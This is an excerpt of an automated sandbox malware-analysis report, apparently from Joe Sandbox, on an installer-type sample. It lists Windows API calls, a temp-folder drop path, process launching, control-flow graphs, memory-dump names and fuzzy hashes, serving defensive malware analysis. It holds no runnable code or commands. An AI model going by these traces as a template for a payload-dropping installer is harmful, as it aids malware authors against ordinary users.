            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
            • RegCloseKey.ADVAPI32(?), ref: 00402C65
            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Close$DeleteEnumOpen
            • String ID:
            • API String ID: 1912718029-0
            • Opcode ID: 58c60bd3f3897121054778c1da70f1d8408b3ab71b88223ff436e3f080a0af7a
            • Instruction ID: b9f5b7c8593eadded22e2ca3cbb8d83d08b5e31647f9888e60cfbaa55d101d4e
            • Opcode Fuzzy Hash: 58c60bd3f3897121054778c1da70f1d8408b3ab71b88223ff436e3f080a0af7a
            • Instruction Fuzzy Hash: 66116A71504119FFEF10AF90DF8CEAE3B79FB14384B10007AF905E11A0D7B58E55AA69

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 692 401e66-401e77 call 402bbf call 4052dd call 40585e 698 401e7c-401e81 692->698 699 401e87-401e8a 698->699 700 40281e-402825 698->700 702 401edb-401ee4 CloseHandle 699->702 703 401e8c-401e9c WaitForSingleObject 699->703 701 402a4c-402a5b 700->701 702->701 705 401eac-401eae 703->705 706 401eb0-401ec0 GetExitCodeProcess 705->706 707 401e9e-401eaa call 406594 WaitForSingleObject 705->707 709 401ec2-401ecd call 4060c5 706->709 710 401ecf-401ed2 706->710 707->705 709->702 710->702 713 401ed4 710->713 713->702
            APIs
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
              • Part of subcall function 004052DD: lstrcatW.KERNEL32(afledes,00402E19,00402E19,afledes,00000000,00000000,00000000), ref: 00405338
              • Part of subcall function 004052DD: SetWindowTextW.USER32(afledes,afledes), ref: 0040534A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
              • Part of subcall function 0040585E: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
              • Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894
            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
            • String ID:
            • API String ID: 3585118688-0
            • Opcode ID: 3d20922f18fbf4668c869f06af6f877473193c74f2ceb5d254dd7f564bd7c1c4
            • Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
            • Opcode Fuzzy Hash: 3d20922f18fbf4668c869f06af6f877473193c74f2ceb5d254dd7f564bd7c1c4
            • Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99
            APIs
              • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30,75923420,?,75922EE0,0040598F,?,75923420,75922EE0,00000000), ref: 00405BEB
              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
              • Part of subcall function 004057AC: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable,?,00000000,000000F0), ref: 00401645
            Strings
            • C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable, xrefs: 00401638
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentFile
            • String ID: C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable
            • API String ID: 1892508949-4014694577
            • Opcode ID: 4289ecf9022edce2b0f810dab56c097014bc9f662f779b51a8498854ed536c01
            • Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
            • Opcode Fuzzy Hash: 4289ecf9022edce2b0f810dab56c097014bc9f662f779b51a8498854ed536c01
            • Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E
            APIs
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
            • CloseHandle.KERNEL32(?), ref: 00405894
            Strings
            • Error launching installer, xrefs: 00405871
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CloseCreateHandleProcess
            • String ID: Error launching installer
            • API String ID: 3712363035-66219284
            • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
            • Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
            • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
            • Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
            • Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
            • Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
            • Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
            • Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
            • Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
            • Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
            • Instruction ID: c728d5504c89e28601c55753f21d2f559f3974f1a6ce44cf054f885a45476dee
            • Opcode Fuzzy Hash: 683f34e5330f3119535e65c3fcc014917b66dea9351a733ad05ad489270f429c
            • Instruction Fuzzy Hash: 06813471D04228CFDF24CFA8C844BADBBB1FB44305F25816AD856BB291C7789A86DF45
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
            • Instruction ID: 5389f57cfb4a3ea8b0a271fe5c21418892ef356aef38e154ca47b5156c43700c
            • Opcode Fuzzy Hash: a646d1c18714c06b63ca95da94aa03745834858b299022791e2b3ebf89425e7d
            • Instruction Fuzzy Hash: 37816831D04229CBDF24CFA8C844BADBBB0FF44305F11816AD956BB281D7785986DF45
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
            • Instruction ID: 7cecadd07089ef5f508d2048bcf4206a214b5fe31ba49bd0cdf53ec9cfb3ce0b
            • Opcode Fuzzy Hash: 96da27bd456154c1aedaa85bcfc68d0a261e277abb4cee4e4020ac7d50c7f0c5
            • Instruction Fuzzy Hash: 35712175D04228CBDF28CFA8C844BADBBB1FB44305F15816AD806BB281D7789A96DF44
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
            • Instruction ID: f96eec566abe8136b7696836c8602221009d3abbc3cba5cf828ad5cd02611e0d
            • Opcode Fuzzy Hash: 29e3b149f88ae6fd458fdcc74d478f48b2ed7dfe8c3e809ea2d72e9fd2fa3729
            • Instruction Fuzzy Hash: 56713371D04228CBEF28CFA8C844BADBBB1FF44305F15816AD856BB281C7789996DF45
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
            • Instruction ID: 17f295adf0ba2181094cfffbed918b39bb4908eb68d6975640ddb9889f0749db
            • Opcode Fuzzy Hash: b9c673c2534040230f9089defbd7d825788091a80835a4c341425c1e948b069d
            • Instruction Fuzzy Hash: F2714531D04229CBEF28CF98C844BADBBB1FF44305F11816AD816BB291C7785A96DF44
            APIs
            • GetTickCount.KERNEL32 ref: 00403203
              • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
            • SetFilePointer.KERNELBASE(00003021,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FilePointer$CountTick
            • String ID:
            • API String ID: 1092082344-0
            • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
            • Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
            • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
            • Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D
            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
              • Part of subcall function 004052DD: lstrcatW.KERNEL32(afledes,00402E19,00402E19,afledes,00000000,00000000,00000000), ref: 00405338
              • Part of subcall function 004052DD: SetWindowTextW.USER32(afledes,afledes), ref: 0040534A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
